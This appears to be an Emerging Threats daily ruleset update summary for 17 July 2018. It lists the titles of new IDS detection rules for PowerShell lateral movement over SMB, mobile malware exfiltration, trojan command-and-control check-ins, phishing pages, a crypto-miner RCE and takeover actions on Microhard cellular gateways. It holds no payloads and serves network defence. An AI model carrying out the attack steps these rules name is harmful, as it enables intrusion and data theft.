Daily Ruleset Update Summary
Daily Ruleset Update Summary 2018/07/17

[***]            Summary:            [***]

14 new Open, 58 new Pro (14 + 44). Powershell over SMB, Parasite HTTP, Nanopool RCE, Simple Botnet, Various Phish, Mobile.

Thanks: Kevin Ross

[+++]          Added rules:          [+++]

Open:

2025719 - ET POLICY Powershell Activity Over SMB - Likely Lateral Movement (policy.rules)
2025720 - ET POLICY Powershell Command With Hidden Window Argument Over SMB - Likely Lateral Movement (policy.rules)
2025721 - ET POLICY Powershell Command With Encoded Argument Over SMB - Likely Lateral Movement (policy.rules)
2025722 - ET POLICY Powershell Command With No Profile Argument Over SMB - Likely Lateral Movement (policy.rules)
2025723 - ET POLICY Powershell Command With Execution Bypass Argument Over SMB - Likely Lateral Movement (policy.rules)
2025724 - ET POLICY Powershell Command With NonInteractive Argument Over SMB - Likely Lateral Movement (policy.rules)
2025725 - ET POLICY RunDll Request Over SMB - Likely Lateral Movement (policy.rules)
2025726 - ET POLICY WMIC WMI Request Over SMB - Likely Lateral Movement (policy.rules)
2025727 - ET MOBILE_MALWARE iOS/Bahamut DNS Lookup (mobile_malware.rules)
2025728 - ET MOBILE_MALWARE iOS/Bahamut DNS Lookup 2 (mobile_malware.rules)
2025729 - ET MOBILE_MALWARE iOS/Bahamut DNS Lookup 3 (mobile_malware.rules)
2025730 - ET MOBILE_MALWARE iOS/Bahamut DNS Lookup 4 (mobile_malware.rules)
2025731 - ET MOBILE_MALWARE iOS/Bahamut DNS Lookup 5 (mobile_malware.rules)
2025732 - ET WEB_SPECIFIC_APPS ELF file magic encoded ASCII Inbound Web Servers Likely Command Execution 4 (web_specific_apps.rules)

Pro:

2831815 - ETPRO MOBILE_MALWARE Android.Riskware.Downloader.GE Uploading Activity (mobile_malware.rules)
2831816 - ETPRO MOBILE_MALWARE Android Trojan-Spy Arid Viper Uploading Device Info (mobile_malware.rules)
2831817 - ETPRO CURRENT_EVENTS Likely Malicious JS Inbound (current_events.rules)
2831818 - ETPRO MOBILE_MALWARE Android Riskware Dudata Device Info Exfil (mobile_malware.rules)
2831819 - ETPRO WEB_SPECIFIC_APPS Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Configuration Download (web_specific_apps.rules)
2831820 - ETPRO WEB_SPECIFIC_APPS Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Configuration Download (web_specific_apps.rules)
2831821 - ETPRO WEB_SPECIFIC_APPS Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Configuration Download (web_specific_apps.rules)
2831822 - ETPRO WEB_SPECIFIC_APPS Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Service Stop (web_specific_apps.rules)
2831823 - ETPRO WEB_SPECIFIC_APPS Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Process Kill (web_specific_apps.rules)
2831824 - ETPRO WEB_SPECIFIC_APPS Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Service start (web_specific_apps.rules)
2831825 - ETPRO WEB_SPECIFIC_APPS Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Service Enable (web_specific_apps.rules)
2831826 - ETPRO WEB_SPECIFIC_APPS Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Change Admin Passwd (web_specific_apps.rules)
2831827 - ETPRO WEB_SPECIFIC_APPS Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Add Admin Passwd (web_specific_apps.rules)
2831828 - ETPRO WEB_SPECIFIC_APPS Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Add Root Htpasswd (web_specific_apps.rules)
2831829 - ETPRO WEB_SPECIFIC_APPS Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Crontab (web_specific_apps.rules)
2831830 - ETPRO WEB_SPECIFIC_APPS Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Startup Script (web_specific_apps.rules)
2831831 - ETPRO WEB_SPECIFIC_APPS Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Disable Firewall (web_specific_apps.rules)
2831832 - ETPRO WEB_SPECIFIC_APPS Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Start the Microhard Sh (msshc) service (web_specific_apps.rules)
2831833 - ETPRO WEB_SPECIFIC_APPS Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Auto-enable the Microhard Sh (msshc) service (web_specific_apps.rules)
2831834 - ETPRO TROJAN Parasite HTTP Checkin (trojan.rules)
2831835 - ETPRO TROJAN W32/Chthonic CnC Domain (bookreader .bit in DNS Lookup) (trojan.rules)
2831836 - ETPRO TROJAN W32/Chthonic CnC Domain (doghunter .bit in DNS Lookup) (trojan.rules)
2831837 - ETPRO TROJAN Cerber Domain Observed (1cknbd .top in DNS Lookup) (trojan.rules)
2831838 - ETPRO TROJAN Cerber Domain Observed (1cknbd .top in TLS SNI) (trojan.rules)
2831839 - ETPRO CURRENT_EVENTS Observed Malicious SSL Cert (MalDoc DL 2018-07-17) (current_events.rules)
2831840 - ETPRO EXPLOIT Nanopool Claymore Dual Miner Remote Code Execution Linux (exploit.rules)
2831841 - ETPRO EXPLOIT Nanopool Claymore Dual Miner Remote Code Execution Windows (exploit.rules)
2831842 - ETPRO TROJAN Simple Botnet CnC Checkin (trojan.rules)
2831843 - ETPRO CURRENT_EVENTS Appleconnect Verification Code - Phishing Landing 2018-07-17 (current_events.rules)
2831844 - ETPRO CURRENT_EVENTS Successful ASB Bank Phish 2018-07-17 (current_events.rules)
2831845 - ETPRO CURRENT_EVENTS Successful Human Resources Phish 2018-07-17 (current_events.rules)
2831846 - ETPRO WEB_SPECIFIC_APPS Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Default Credentials (web_specific_apps.rules)
2831847 - ETPRO TROJAN Kot1Key CnC Checkin (trojan.rules)
2831848 - ETPRO CURRENT_EVENTS Successful Apple Find my iPhone Phish 2018-07-17 (current_events.rules)
2831849 - ETPRO CURRENT_EVENTS Successful Wells Fargo Phish 2018-07-17 (current_events.rules)
2831850 - ETPRO TROJAN MSIL/Racoon3000 CnC Exil M2 (trojan.rules)
2831851 - ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-17 1) (trojan.rules)
2831852 - ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-17 2) (trojan.rules)
2831853 - ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-17 3) (trojan.rules)
2831854 - ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-17 4) (trojan.rules)
2831855 - ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-17 5) (trojan.rules)
2831856 - ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-17 6) (trojan.rules)
2831857 - ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-17 7) (trojan.rules)
2831858 - ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-17 8) (trojan.rules)

[///]     Modified active rules:     [///]

2011582 - ET POLICY Vulnerable Java Version 1.6.x Detected (policy.rules)
2014297 - ET POLICY Vulnerable Java Version 1.7.x Detected (policy.rules)
2017128 - ET TROJAN W32.Berbew Check-in (trojan.rules)
2019401 - ET POLICY Vulnerable Java Version 1.8.x Detected (policy.rules)
2025314 - ET POLICY Vulnerable Java Version 9.0.x Detected (policy.rules)
2025518 - ET POLICY Vulnerable Java Version 10.0.x Detected (policy.rules)

Date:
Summary title:
14 new Open, 58 new Pro (14 + 44). Powershell over SMB, Parasite HTTP, Nanopool RCE, Simple Botnet, Various Phish, Mobile.